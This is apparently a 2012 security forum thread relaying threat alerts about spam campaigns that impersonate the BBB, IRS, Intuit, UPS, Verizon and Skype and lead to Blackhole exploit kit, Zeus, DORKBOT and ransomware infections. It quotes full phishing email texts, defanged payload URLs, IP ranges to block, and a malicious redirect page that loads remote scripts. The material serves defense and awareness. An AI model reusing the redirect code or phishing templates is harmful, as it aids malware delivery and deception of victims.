... As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn, the techniques, tools and redirection path that are used are pretty much the same. Tools like the Cutwail spambot and Blackhole exploit kit seem to be the main weapons used by cybercriminals in malicious spam nowadays. Redirection paths:
1) hxxp ://vargasvilcolombia .com/PykKDZe/index.html
2)<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>
</html>
3) document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';
As is very common these days, the payload for this particular campaign is the recently updated BlackHole Exploit Kit v 2.0..."
___
BBB Spam / 108.178.59.11
- http://blog.dynamoo.com/2012/09/bbb-...081785911.html
24 Sep 2012 - "... most likely a Blackhole 2 kit. This IP address has been used in other attacks and should be blocked if you can."
- http://centralops.net/co/DomainDossier.aspx
108.178.59.11
network:State: Italy
OriginAS: AS32475
- http://google.com/safebrowsing/diagnostic?site=AS:32475
"... over the past 90 days, 2949 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-24, and the last time suspicious content was found was on 2012-09-24... we found 149 site(s)... that appeared to function as intermediaries for the infection of 375 other site(s)... We found 141 site(s)... that infected 838 other site(s)..."
:mad:
-
Twitter DMs from "friends" lead to backdoor Trojan...
FYI...
Twitter DMs from "friends" lead to backdoor Trojan
- http://nakedsecurity.sophos.com/2012...video-malware/
Sep 24, 2012 - "Have you received a Twitter message from an online friend, suggesting you have been captured in a Facebook video?... The aim of the messages? To trick the unwary into clicking on a link... and ultimately infect computers. Here is one example:
> https://sophosnews.files.wordpress.c...cked.jpg?w=640
... here's another. Note that there are many different combinations of wording that can be used.
> https://sophosnews.files.wordpress.c...ed-2.jpg?w=640
Users who click on the link are greeted with what appears to be a video player and a warning message that "An update to Youtube player is needed". The webpage continues to claim that it will install an update to Flash Player 10.1 onto your computer.
> https://sophosnews.files.wordpress.c...ware.jpg?w=640
... In this example, the program you are being invited to download is called FlashPlayerV10.1.57.108.exe, and is detected by Sophos anti-virus products as Troj/Mdrop-EML, a backdoor Trojan that can also copy itself to accessible drives and network shares. Quite how users' Twitter accounts became compromised to send the malicious DMs in the first place isn't currently clear, but the attack underlines the importance of -not- automatically clicking on a link just because it appeared to be sent to you by a trusted friend. If you do find that it was your Twitter account sending out the messages, the sensible course of action is to assume the worst, change your password (make sure it is something unique, hard-to-guess and hard-to-crack) and revoke permissions of any suspicious applications that have access to your account."
:mad:
-
Multiple malware IP's to be blocked ...
FYI...
Evil network: 108.178.59.0/26
- http://blog.dynamoo.com/2012/09/evil...817859026.html
25 Sep 2012 - "There's quite a bit of malware coming from a range of Singlehop IPs over the past few days. The range is 108.178.59.0/26 (108.178.59.0 - 108.178.59.63)
So far, I've seen blackhole samples from 108.178.59.20, 108.178.59.11 and 108.178.59.26 which is enough to convince me that the whole /26 is bad and should be blocked.
Singlehop have reallocated the IP range to a customer:
network: IP-Network: 108.178.59.0/26
network: State: Italy
network: Country-Code: IT ...
It's quite possible that Mr Coco doesn't know that the IP range is being abused in this way, but blocking access to it would be prudent..."
- http://centralops.net/co/DomainDossier.aspx
network: IP-Network: 108.178.59.0/26
network: State:Italy
network: Country-Code: IT
___
BBB SPAM / one.1000houses .biz
- http://blog.dynamoo.com/2012/09/bbb-...housesbiz.html
25 Sep 2012 - "This fake BBB spam leads to malware at one.1000houses .biz:
Date: Tue, 25 Sep 2012 11:42:18 +0200
From: "Better.Business Bureau" [8050910@zread.com]
Subject: Activity Report
Dear business owner, we have received a complaint about your company possible involvement in check cashing and Money Order Scam.
You are asked to provide response to this complaint within 7 days.
Failure to provide the necessary information will result in downgrading your Better Business Bureau rating and possible cancellation of your BBB accreditation status.
Complaint ID#125368
Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277
The malicious payload is at [donotclick]one.1000houses .biz/links/deep_recover-result.php hosted on 199.195.116.185 (A2 Hosting, US). The domain 1000houses .biz appears to be a legitimate domain where the GoDaddy account has been hacked to serve malware on subdomains. There seems to be a long-standing issue with GoDaddy domains being used in this way.
Blocking 199.195.116.185 would probably be prudent..."
:mad: :mad:
-
FTC halts computer spying
FYI...
FTC halts computer spying
* http://www.ftc.gov/opa/2012/09/designware.shtm
09/25/2012
Rent-to-own laptops were spying on users
- http://h-online.com/-1717567
26 Sep 2012 - "The US Federal Trade Commission (FTC) has settled a case with several computer rent-to-own companies and a software maker over their use of a program which spied on as many as 420,000 users of the computers. The terms of the settlement* will ban the companies from using monitoring software, deceiving customers into giving up information or using geo-location to track users. "The FTC orders today will put an end to their cyber spying" said Jon Leobowitz, FTC Chairman. The software for rental companies from DesignerWare included a "Detective Mode", a spyware application that, according to the FTC's complaint, could activate the webcam of a laptop and take pictures and log keystrokes of user activity. The software also regularly presented a fake registration screen designed to trick users into entering personal information. The data from this application was then transmitted to DesignerWare where it was then passed on to the rent-to-own companies... The FTC is limited in its actions, telling Wired**, "We don't have criminal authority. We only have civil authority" and, as this was a first violation of the FTC act, it cannot impose fines on the companies. Instead, the companies will be monitored by the FTC for compliance with the ban on using the software, or, in the case of DesignerWare, licensing it, for the next 20 years..."
** http://www.wired.com/threatlevel/201...yware-scandal/
:mad:
-
Spear Phishing Emails increase 56% ...
FYI...
Spear Phishing Emails increase 56% ...
- http://blog.fireeye.com/research/201...ng-emails.html
2012.09.25 - "Despite the many security defenses aimed at protecting email communications, email continues to be a critical vulnerability for enterprises. Between Q1 2012 and Q2 2012 alone, FireEye reported a 56% increase in the amount of malicious emails - and this wasn’t simply an increase in the total number of emails distributed; it was an increase in the number of emails that were able to -bypass- signature and reputation-based security defenses, like next-generation firewalls, intrusion prevention systems (IPS), anti-virus (AV), and secure gateways... In a new report from FireEye*, FireEye researchers analyze the nature of malicious files cybercriminals distribute in order to bypass traditional security defenses and identify several trends - including the most common words in file names and file extensions used in spear phishing attacks. Among these trends, in particular, FireEye researchers found:
• File names relating to shipping grew from 19.20% to 26.35%.
• Number of files referencing words associated with urgency grew from 1.72% to 10.68%.
• Shipping-related words topped the lists of most frequently appearing words in spear phishing emails for both 2H 2011 and 1H 2012.
In the security community, we’re more than familiar with the consequences stemming from these kinds of advanced cyber attacks - GhostNet, Night Dragon, Operation Aurora, and the RSA breach all originated, at least in part, via targeted spear phishing emails. These highly publicized incidents only further indicate what cybercriminals already well know and use to their advantage: email is a mode of attack that works..."
* http://www.fireeye.com/resources/pdf...hing-words.pdf
:mad:
-
IRS SPAM - 3 different versions ...
FYI...
IRS SPAM - 3 different versions ...
- http://blog.dynamoo.com/2012/09/irs-...ancom-and.html
26 Sep 2012 - "Three different versions of fake IRS spam today, two leading to malware on 1.howtobecomeabostonian .com and the other with a malicious payload on mortal-records .net.
Date: Wed, 26 Sep 2012 20:44:47 +0530
From: "Internal Revenue Service (IRS)" [58D1F47@guyzzer.com]
To: [redacted]
Subject: Internal Revenue Service: For the attention of enterpreneurs
Internal Revenue Service (IRS)
Hello,
Due to the system error the EIN of your company has been accidently erased from the online database, please validate your EIN to reaffirm your current status of taxpayer. Certain indulgences will be applied to the next audit report for your company. IRS is sorry to cause inconvenience.
For detail information, please refer to:
https ://www.irs .gov/Login.aspx?u=E8710D9E9
Email address: [redacted]
Sincerely yours,
Barry Griffin
IRS Customer Service representative
Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
You will need to use your email address to log in.
This service is provided to you at no charge by the Internal Revenue Service (IRS).
This email was sent to [redacted] by: Internal Revenue Service (IRS) � Internal Revenue Service � 1111 Constitution Ave. N.W. � Washington DC 20535
==========
Date: Wed, 26 Sep 2012 11:09:45 -0400
From: "Internal Revenue Service (IRS)" [90A75BC@etherplay.com]
To: [redacted]
Subject: Internal Revenue Service: For the attention of enterpreneurs
Internal Revenue Service (IRS)
Dear business owners,
Due to the corrections in the taxation policies that have been recently applied, IRS informs that LLC, C-Corporations and S-Corporations have to validate their EIN in order to reaffirm their actual status. You have 14-day period in order to examine all the changes and make necessary amendments. We are sorry for the inconvenience caused.
For the details please refer to:
https ://www.irs .gov/ClientArea.aspx?u=1CBD0FC829256C
Email address: [redacted]
Sincerely yours,
Damon Abbott
Internal Revenue Service Representative
Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
You will need to use your email address to log in.
This service is provided to you at no charge by the Internal Revenue Service (IRS).
This email was sent to [redacted] by: Internal Revenue Service (IRS) � Internal Revenue Service � 1111 Constitution Ave. N.W. � Washington DC 20535
==========
Date: Wed, 26 Sep 2012 19:53:28 +0400
From: Internal Revenue Service [weirdpr6@polysto.com]
To: [[redacted]]
Subject: IRS report of not approved tax bank transfer
Your Federal Tax pending transaction (ID: 52007291963155), recently ordered for processing from your checking account was rejected by your Bank.
Rejected Tax transaction
Tax Transaction ID: 52007291963155
Reason ID See details in the report below
State Tax Transaction Report tax_report_52007291963155.doc (Microsoft Word Document)
Internal Revenue Service 9611 Tellus. Av. Augusta 38209 MV
Payload one is at [donotclick]1.howtobecomeabostonian .com/links/marked-alter.php hosted on 74.207.232.13 (Linode, US) which looks like a -hacked- GoDaddy domain. Payload two is at [donotclick]mortal-records .net/detects/processing-successfully.php hosted on 203.91.113.6 (G-Mobile, Mongolia) which is an IP address that has been used a LOT for this type of attack. Blocking those IPs would be ideal..."
:mad:
-
Fake iPhone emails/sales sites ...
FYI...
Fake iPhone sales emails/sites ...
- http://blog.webroot.com/2012/09/27/f...iate-networks/
Sep 27, 2012 - "... cybercriminals continue introducing new services and goods with questionable quality and sometimes unknown origins on the market, with the idea to entice potential network participants into monetizing the traffic they can deliver through black hat SEO (Search Engine Optimization), malvertising, and spam campaigns... a recently launched affiliate network selling iPhones that primarily targets Russian-speaking customers, and emphasizes the traffic acquisition scheme used by one of the network’s participants... It all starts with a spam campaign offering brand new iPhones for a decent price in an attempt by one of the network participants to acquire traffic which will ultimately convert into sales.
Sample spamvertised email offering cheap and easy-to-obtain iPhones"
> https://webrootblog.files.wordpress....te_network.png
... an example of an affiliate network participant targeting English-speaking users, even though the actual web site is targeting Russian-speaking users...
Sample screenshot of the entry page for the iPhone selling affiliate network:
> https://webrootblog.files.wordpress....te_network.png
(More samples available at the blog.webroot URL above)...
We advise bargain hunters to avoid clicking on links found in spam emails, avoid entering their credit card details on sites found in spam emails, and to avoid purchasing -any- kind of item promoted in these emails."
:mad:
-
SPAM leads to malware - 2012.10.01...
FYI... multiple entries:
Intuit SPAM - Shipment / art-london .net
- http://blog.dynamoo.com/2012/10/intu...londonnet.html
1 Oct 2012 - "This terminally confused Intuit / USPS / Amazon-style spam leads to malware...
Date: Mon, 1 Oct 2012 21:31:57 +0430
From: "Intuit Customer Service" [battingiy760@clickz.com]
To: [redacted]
Subject: Intuit Shipment Confirmation
Dear [redacted],
Great News! Your order, ID859560, was shipped today (see info below) and will complete shortly. We hope that you will find that it exceeds your expectations. If you ordered not one products, we may send them in separate boxes (at no additional cost to you) to ensure the fastest possible delivery. We will also provide you with the ability to track your shipments via the information below.
Thank you for your interest.
ORDER DETAILS
Order #: ID859560
Order Date: Sep 25, 2012
Item(s) In Your Order
Shipping Date: October, 1 2012
Shipping Method: USPS Express Mail
Estimated Delivery Date: October, 3 2012 - October 05, 2012
Tracking No.: 5182072894288348304217
Quantity Item
1 Intuit Card Reader Device - Gray
Please be informed that shipping status details may be not available yet online. Check the Website Status link above for details update.
Shipment Information:
We sent your item(s) to the next address:
065 S Paolo Ave, App. 5A
S Maria, FL
Email: [redacted]
Questions about your order? Please visit Customer Service.
Return Policy and Instructions
Privacy | Legal Disclaimer | Contact Us | About
You have received this business note as part of our efforts to fulfill your request and service your account. You may receive more email notifications from us even if you have previously selected out of marketing notifications...
The malicious payload is at [donotclick]art-london .net/detects/stones-instruction_think.php hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden), a site which also hosts the presumably malicious domain indice-acores .net. Presumably this IP is a hacked server belonging to some legitimate Swedish organisation, but you should block it nonetheless."
___
Fake Intuit order confirmation
- http://security.intuit.com/alert.php?a=59
10/01/2012 - "... receiving emails with the title "Your Intuit Order Notification."
Below is a copy of the email people are receiving:
> http://security.intuit.com/images/yourintuitorder.jpg
... This is the end of the fake email. Steps to Take Now: Do not click on the link in the email... Delete the email..." etc...
___
Sendspace SPAM / onlinebayunator .ru
- http://blog.dynamoo.com/2012/10/send...yunatorru.html
1 Oct 2012 - "I haven't seen Sendspace spam before.. but here it is, leading to malware on onlinebayunator .ru:
Date: Mon, 1 Oct 2012 10:40:29 +0300
From: Twitter
To: [redacted]
Subject: You have been sent a file (Filename: [redacted]-9038870.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-56.pdf, (133.8 KB) waiting to be downloaded at sendspace.(It was sent by CHIQUITA Caldwell).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service...
The malicious payload is at [donotclick]onlinebayunator .ru:8080/forum/links/column.php hosted on the same IP address ( 84.22.96.0/19 ) as this attack* earlier today.
* http://blog.dynamoo.com/2012/10/nach...yunatorru.html
___
Evolution1 SPAM / 69.194.194.221
- http://blog.dynamoo.com/2012/10/evol...194194221.html
1 Oct 2012 - "I haven't seen this spam before, it leads to malware on 69.194.194.221:
Date: Mon, 01 Oct 2012 15:44:59 +0200
From: "INTUIT" [D6531193@familyhealthplans.com]
Subject: Information regarding Employer Contribution
INTUIT
Attn: Account Holder
You can view the information about all Employer contributions that are due to be made on 2/1/2012 by visiting the following link:
http ://intuithealthemployer .lh1ondemand .com
Please let us know employment alterations on your enrollment spreadsheet within the period of two business days. The foregoing report shows the ACH amount we will withdraw from your bank account for the contributions on the first business day of the month. Please remember, if changes occur, this may affect the ACH amount.
Intuit Health Debit Card Powered by Evolution1 Employer Services..."
The malicious payload is on 69.194.194.221 (Solar VPS, US) ..."
___
NACHA SPAM / onlinebayunator .ru
- http://blog.dynamoo.com/2012/10/nach...yunatorru.html
1 Oct 2012 - "This fake NACHA spam leads to malware on onlinebayunator.ru:
Date: Mon, 1 Oct 2012 04:16:46 -0500
From: Bebo Service [service@noreply.bebo.com]
Subject: Fwd: ACH Transfer rejected
The ACH debit transfer, initiated from your bank account, was canceled.
Canceled transaction:
Transfer ID: FE-764029897226US
Transaction Report: View
Valentino Dickey
NACHA - The Electronic Payment Association
f0c34915-3e624bbb...
The malicious payload is at [donotclick]onlinebayunator .ru:8080/forum/links/column.php (probably a Blackhole 2 exploit kit) hosted on the following familiar IPs that should be blocked:
84.22.100.108 (Republic CyberBunker, Antarctica - Amsterdam more likely)
190.10.14.196 (RACSA, Costa Rica)
203.80.16.81 (Myren, Malaysia)
Of note, CyberBunker has a long history of spamming and tolerating criminals. Blocking the range 84.22.96.0/19 should afford your network some additional protection."
:mad: :mad: :mad:
-
SPAM fakes 4 U ... 2012.10.02
FYI... multiple entries:
Fake ecard - unsolicited secret admirers via Email
- http://community.websense.com/blogs/...via-email.aspx
02 Oct 2012 - "... an unsolicited email campaign in which love-struck or curious recipients may have their appetites whetted by the thought of a secret admirer... The messages, sent from various Yahoo .com accounts, suggest that the sender has "to let you know how [they] feel" and provide an enticing Facebook link to "View Your Ecard":
> http://community.websense.com/cfs-fi...2D00_550x0.png
... a valid short Facebook URL is used which, in this case, -redirects- ... a basic JavaScript is delivered... The victim's browser is then directed to a fake ecard site hxxp ://readyourecard .com/viewmessage/?a=vip36
> http://community.websense.com/cfs-fi...2D00_550x0.png
... At this point, the aim of the campaign becomes clear: Every link on the fake ecard page redirects to an affiliate landing page on the Adult Dating website AdultFriendFinder .com and, with affiliate earnings of up to $1 per unique visitor, you can easily see how such a campaign could become very lucrative... This campaign appears to be financially driven, but it is conceivable that the same techniques could be used to direct victims to malicious sites..."
___
Fake Fax Email notifications ...
- http://www.gfi.com/blog/beware-fake-...n-circulation/
Oct 2, 2012 - "In the last few days we’ve seen this fake fax email doing the rounds, offering up a “2013 recruitment plan”:
> http://www.gfi.com/blog/wp-content/u...axmalware1.jpg
... INCOMING FAX REPORT
*********************************************************
Date/Time: 09/28/2012 07:01:41 AM
Speed: 14400 bps
Connection time: 01:02
Pages: 2
Resolution: Normal
Remote ID: 0420950504
Line number: 2
DTMF/DID:
Description: 2013 Recruitment plan
Click here to view the file online ..."
... Clicking the link would take the user from a (dot)de domain to an IP associated with a Malware run currently taking place... currently leads to a "page not found":
> http://www.gfi.com/blog/wp-content/u...axnotfound.jpg
... varied subject lines in this particular spam campaign – everything from recruitment plans to employment contributions and transaction reports – indicate a definite lean towards business targets rather than home users. Of course, whether at home or in the workplace you’re still potentially at risk should you click any of the links going out in this spamrun..."
:mad:
-
SPAM leading to malware ...
FYI...
Fake Quickbooks emails lead to malware
- http://www.gfi.com/blog/fake-quickbo...-shenanigans/?
Oct 3, 2012 - "We have some more rogue emails following the familiar pattern of the last few days – this time around, a fake Quickbooks themed email which promises “free shipping for Quickbooks customers”:
> http://www.gfi.com/blog/wp-content/u...kbooksspam.jpg
It points to a website that shows the end-user a “connecting to server” message, eventually redirecting to an IP address that has been / is still associated with Blackhole Exploit Kit and Java exploits.
> http://www.gfi.com/blog/wp-content/u...booksspam2.jpg
... it’s a bad time to be randomly opening dubious emails..."
Fake QB/IRS order forms emails
- http://security.intuit.com/alert.php?a=62
10/03/2012
> http://security.intuit.com/images/phish63.jpg
___
Something evil on 66.45.251.224/29 and 199.71.233.226
- http://blog.dynamoo.com/2012/10/some...22429-and.html
3 Oct 2012 - "The IP address 199.71.233.226 (Netrouting, US) and the range 66.45.251.224/29 (Interserver, US) are currently being used to distribute malware through advertising. Of these the 66.45.251.224/29 has been suballocated to an anonymous person, which I didn't even know was permitted... The domains listed below are on those IP addresses, all appear to be disributing malware (see example*) and they seem to have fake or anonymous WHOIS details. Blocking traffic to 66.45.251.224/29 (66.45.251.224 - 66.45.251.231) and 199.71.233.226 should be effective in countering this threat..."
Update: 95.211.193.36 (Leaseweb, Netherlands) and 77.95.230.77 (Snel Internet Services, Netherlands) may also be distributing malware in connection with this (report here**).
(More info at the blog.dynamoo URL above.)
* http://www.google.com/safebrowsing/d...juniorppv.info
"Site is listed as suspicious... Malicious software includes 8 trojan(s)..."
** http://wepawet.iseclab.org/view.php?...259972&type=js
___
Friendster SPAM / sonatanamore .ru
- http://blog.dynamoo.com/2012/10/frie...anamoreru.html
2 Oct 2012 - "Friendster.. remember that? Before Facebook.. before Myspace.. there was Friendster. This spam email is -not- from Friendster though and leads to malware on sonatanamore .ru:
Date: Tue, 2 Oct 2012 05:39:54 -0500
From: Friendster Games [friendstergames@friendster.com]
Thank you for joining Friendster! Your system generated password is 0JR8YXB1YR. You may change your password in your Account Settings Page.
Friendster is the social gaming destination of choice. Connect and play with your friends & share your progress with your network.
Copyright ? 2002 - 2012 Friendster, Inc. All rights reserved. Visit our site. - Terms of Service
To manage your notification preferences, go here
To stop receiving emails from us, you can unsubscribe here
The malicious payload is at [donotclick]sonatanamore .ru:8080/forum/links/column.php hosted on:
70.38.31.71 (iWeb, Canada)
202.3.245.13 (MANA, Tahiti)
203.80.16.81 (Myren, Malaysia)
Plain list of IPs and domains on those IPs for copy-and-pasting.
70.38.31.71, 202.3.245.13, 203.80.16.81 ..."
(More listed at the blog.dynamoo URL above.)
:mad:
-
SPAM leads to malware - 'just keeps coming 2012.10.04
FYI...
Fake "Corporate eFax message" SPAM / 184.164.136.147
- http://blog.dynamoo.com/2012/10/corp...164136147.html
4 Oct 2012 - "These fake fax messages lead to malware on 184.164.136.147:
Date: Thu, 04 Oct 2012 19:00:16 +0200
From: "eFax.Alert" [E988D6C @vida .org.pt]
Subject: Corporate eFax message - 09 pages
Fax Message [Caller-ID: 341-498-5688]
You have received a 09 pages fax at Thu, 04 Oct 2012 19:00:16 +0200.
* The reference number for this fax is min1_20121004190016.8673161.
View this fax using your PDF reader.
Click here to view this message
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service!
Home | Contact | Login
� 2011 j2 Global Communications, Inc. All rights reserved.
eFax� is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax� Customer Agreement.
... The malicious payload is at [donotclick]184.164.136.147/links/assure_numb_engineers.php which is an IP address belonging to Secured Servers LLC in the US and suballocated to:
autharea=184.164.128.0/19
xautharea=184.164.128.0/19
network:City:Manilla ...
It might be worth blocking 184.164.136.128/27 to be on the safe side."
- http://www.google.com/safebrowsing/d...?site=AS:20454
"... over the past 90 days, 244 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... the last time suspicious content was found was on 2012-10-04..."
- http://www.google.com/safebrowsing/d...?site=AS:32164
"... the last time suspicious content was found was on 2012-10-03... we found 1 site(s) on this network... that appeared to function as intermediaries for the infection of 14 other site(s)..."
___
Verizon Wireless SPAM / strangernaturallanguage .net
- http://blog.dynamoo.com/2012/10/veri...less-spam.html
4 Oct 2012 - "This fake Verizon wireless spam leads to malware on strangernaturallanguage .net:
From: AccountNotify whitheringj @spcollege .edu
Date: 4 October 2012 18:52
Subject: Recent Notification in My Verizon
SIGNIFICANT ACCOUNT NOTIFICATION FROM VERIZON WIRELESS.
Your informational letter is available.
Your account # ending: XXX8 XXXX4
Our Valued Client
For your accommodation, your confirmation message can be found in the Account Documentation desk of My Verizon.
Please check your acknowledgment letter for all the information relating to your new transaction.
View Approval Message
In addition, in My Verizon you will find links to info about your device & services that may be helpfull if you looking for answers.
Thank you for joining us .
My Verizon is also accessible 24 hours 7 days a week to assist you with:
Usage details
Updating your tariff
Add Account Users
Pay your invoice
And much, much more...
© 2012 Verizon Wireless
Verizon Wireless | One Verizon Way | Mail Code: 523WSE | Basking Ridge, MA 55584
We respect your privacy. Please review our privacy policy for more details
The malicious payload is at [donotclick]strangernaturallanguage .net/detects/notification-status_login.php hosted on 183.81.133.121 (Vodafone, Fiji)..."
:buried:
-
Fake inTuit / UPS SPAM leads to malware...
FYI...
Intuit "GoPayment" SPAM / simplerkwiks .net
- http://blog.dynamoo.com/2012/10/intu...rkwiksnet.html
5 Oct 2012 - "This fake "Intuit GoPayment" spam leads to malware on simplerkwiks .net:
Date: Fri, 5 Oct 2012 15:54:26 +0100
From: "Intuit GoPayment" [abstractestknos65@pacunion.com]
Subject: Welcome - you're been granted access for Intuit GoPayment Merchant
Greetings & Congrats!
Your GoPayment? statement for WALLET , DEVELOPMENTS has been issued.
Intuit Payment
Account No.: XXXXXXXXXXXXXX16
Email Address: [redacted]
NOTE : Additional charges for this service may now apply.
Next step: Confirm your User ID
This is Very Important lets you:
Manage your payment service in the Merchant Center
Review charges
Log In to other Intuit products you may use, like TurboTax, Quicken, and Intuit Payroll
The good news is you have active an existing Intuit account for your email address, You can use this ID for your payment service also, or enter a new one.
Verify UserID
Get started:
Step 1: If you have not still, download the Intuit application.
Step 2: Run the GoPayment app and sign in with the UserID (your email address) and Password you setup.
Easy Manage Your GoPayment System
The Intuit GoPayment Merchant Service Center is the website where you can learn a lot about GoPayment features, customize your sales receipt and add GoPayment users. You can also manage transactions, deposits and fees. Visit link and signin with your GoPayment Access ID (your email address) and Password.
For more information on how to get started using Intuit Merchant, including tutorials, FAQs and other resources, visit the Service Center at web site.
Please do not reply to this message. automative notification system not configured to accept incoming email.
System Terms & Agreements � 2012 Intuit, Inc. All rights reserved.
The malicious payload is at [donotclick]simplerkwiks .net/detects/congrats_verify-access.php hosted on 183.81.133.121 (Vodafone, Fiji) along with these other suspect domains:
addsmozy .net
officerscouldexecute .org
simplerkwiks .net
strangernaturallanguage .net
buzziskin .net
art-london .net "
___
UPS SPAM / minus.preciseenginewarehouse .com
- http://blog.dynamoo.com/2012/10/ups-...ehousecom.html
5 Oct 2012 - "This fake UPS spam leads to malware on minus.preciseenginewarehouse .com:
From: "UPSBillingCenter" [512A03797@songburi.com]
Subject: Your UPS Invoice is Ready
This is an automatically generated email. Please do not reply to this email address.
Dear UPS Customer,
New invoice(s) are available for the consolidated payment plan(s) / account(s) enrolled in the UPS Billing Center
Please visit the UPS Billing Center to view and pay your invoice.
Discover more about UPS:
Visit ups .com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read Compass Online
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
The malicious payload is at [donotclick]minus.preciseenginewarehouse .com/links/assure_numb_engineers.php hosted on 174.140.165.112 ... To be precise, the subdomains seem malicious, the domains themselves appear to be legitimate ones where the domain account has been hacked. Blocking 174.140.165.112 would be prudent."
:mad: :mad:
-
Injection attacks from 5.9.188.54 ...
FYI...
Something evil on 5.9.188.54
- http://blog.dynamoo.com/2012/10/some...n-5918854.html
7 Oct 2012 - "Here's a nasty bunch of sites being used in injection attacks, all hosted on 5.9.188.54:
nfexfkloawuqlaahsyqrxo.qlvyeviexqzrukyo.waw .pl
nqvzrpyoossmr.qlvyeviexqzrukyo.waw .pl
xfynhovgofzsqueuuprplvv.qlvyeviexqzrukyo.waw .pl
lgrfuqfwz.qlvyeviexqzrukyo.waw .pl
zlqfrypzqyubsedrzugeaf.urblvhnfxzrozzlz.waw .pl
qxggipnnfmnihkic .ru
mvuvchtcxxibeubd .ru
5.9.188.54 is a Hetzner IP address (no surprise there) suballocated to:
inetnum: 5.9.188.32 - 5.9.188.63
netname: LLC-CYBERTECH
descr: LLC "CyberTech"
country: DE ...
address: 125252 Moscow
address: RUSSIAN FEDERATION
... You might want to block the whole 5.9.188.32/27 range.. you should certainly block 5.9.188.54 if you can."
- http://centralops.net/co/DomainDossier.aspx
5.9.188.54
address: 125252 Moscow
address: RUSSIAN FEDERATION...
origin: AS24940
- http://google.com/safebrowsing/diagnostic?site=AS:24940
"... over the past 90 days, 5865 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... last time suspicious content was found was on 2012-10-07... we found 998 site(s)... that appeared to function as intermediaries for the infection of 12809 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1752 site(s)... that infected 18780 other site(s)."
:mad:
-
Skype users targeted with Ransomware and Click Fraud
FYI...
Skype users targeted with Ransomware and Click Fraud
- http://www.gfi.com/blog/skype-users-...d-click-fraud/
Oct 8, 2012 - "The infection* that’s still spreading across users of Skype has taken an interesting twist: ransomware and click fraud. Skype users tempted to follow the latest set of infection links will end up with a zipfile on their PC. Here’s an example of the rogue links still being pinged around:
> http://www.gfi.com/blog/wp-content/u...ypevirus41.jpg
Clicking the link will download a zipfile, and running the executable inside will see the infected PC making waves with network traffic that wasn’t present when we tested the last executable...
> http://www.gfi.com/blog/wp-content/u...e4-300x152.jpg
After a while, a Java exploit will call down some fire from the sky (in the form of BlackHole 2.0) and the end-user will be horrified to see this:
> http://www.gfi.com/blog/wp-content/u...tionScare1.jpg
... a typical Ransomware scare message that locks the user out of their data, encrypts the files and demands payment (via Moneypak) to the tune of $200. The IP address and geographical location is displayed in the bottom right hand corner, along with various threats related to the downloading of MP3s, illegal pornography, gambling and more besides. Ransomware is currently a big deal and not something an end-user really wants to have on their computer. Meanwhile, behind the scenes we have what looks like attempts at click fraud taking place behind the locked computer screen... in the space of 10 minutes, we recorded 2,259 transmissions(!)... to infect the computer, you’ll need to manually click the download link, open the zip and run the executable. On top of that, anybody trying to open the file who hasn’t switched off file security warnings will be told that “The publisher could not be verified, are you sure you want to run this software” so there’s plenty of chances to dodge this bullet..."
* http://www.gfi.com/blog/infection-sp...o-skype-users/
:mad:
-
Skype SPAM voicemail leads to Blackhole / Zeus attacks
FYI...
Skype SPAM voicemail leads to Blackhole / Zeus attacks
- http://www.gfi.com/blog/skype-voicem...-zeus-attacks/
Oct 10, 2012 - "... spam mail... claims to be a Skype Voicemail notification, for example:
> http://www.gfi.com/blog/wp-content/u...cemailscam.png
It reads as follows:
Hi there,
You have a new voicemail
Sign in to Skype to listen to the message.
If you no longer want to receive email alerts about new voicemails, unsubscribe now.
Talk soon,
The people at Skype
It looks pretty authentic, and will send curious clickers to URLs tied up in Blackhole / Zeus infections. On a related note, we’re also seeing Sprint Wireless and fake Facebook friend request spam doing much the same as the above so please be careful when wading through your inbox – there’s a fair amount of spam targeting users with exploits right now and it covers a wide range of subjects from payroll notifications and Craigslist adverts to UPS invoices and American Express payment receipts."
- http://pandalabs.pandasecurity.com/i...and-messenger/
10/10/12
___
Skype Messages Spreading DORKBOT Variants
- http://blog.trendmicro.com/trendlabs...kbot-variants/
Oct 9, 2012
- http://blog.trendmicro.com/trendlabs...dorkbot-rises/
Oct 16, 2012 - "... spreading via Skype spammed messages... now reached (more than) 17,500 reported infections globally... DORKBOT is not primarily meant to steal information, but still has the capability to steal login credentials. It does this by hooking several APIs in popular web browsers. Among the sites monitored are Twitter, Facebook, Bebo, Friendster, Paypal, Netflix, and Sendspace. DORKBOT also check strings sent to monitored sites via HTTP POST, thus information in HTTP form files like passwords, usernames, and email addresses... DORKBOT downloads an updated copy of itself per day, which are typically undetected because they arrive with different packers. This is probably done to remain undetected on the infected system. With multiple dangerous routines and propagation methods well-fit into the common users’ typical online activities, DORKBOT is clearly a threat that users need to avoid and protect themselves from..."
- http://blog.spiderlabs.com/2012/10/w...-messages.html
12 Oct 2012
___
Rampaging Squirrel + Boyband = Twitter SPAM
